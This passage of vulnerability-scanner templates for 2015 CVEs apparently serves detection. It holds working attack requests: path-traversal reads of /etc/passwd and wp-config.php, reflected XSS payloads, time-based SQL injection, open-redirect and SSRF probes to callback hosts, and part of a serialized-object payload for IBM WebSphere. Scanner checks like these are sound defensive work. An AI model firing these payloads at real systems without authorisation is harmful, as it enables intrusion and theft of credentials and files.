/etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRh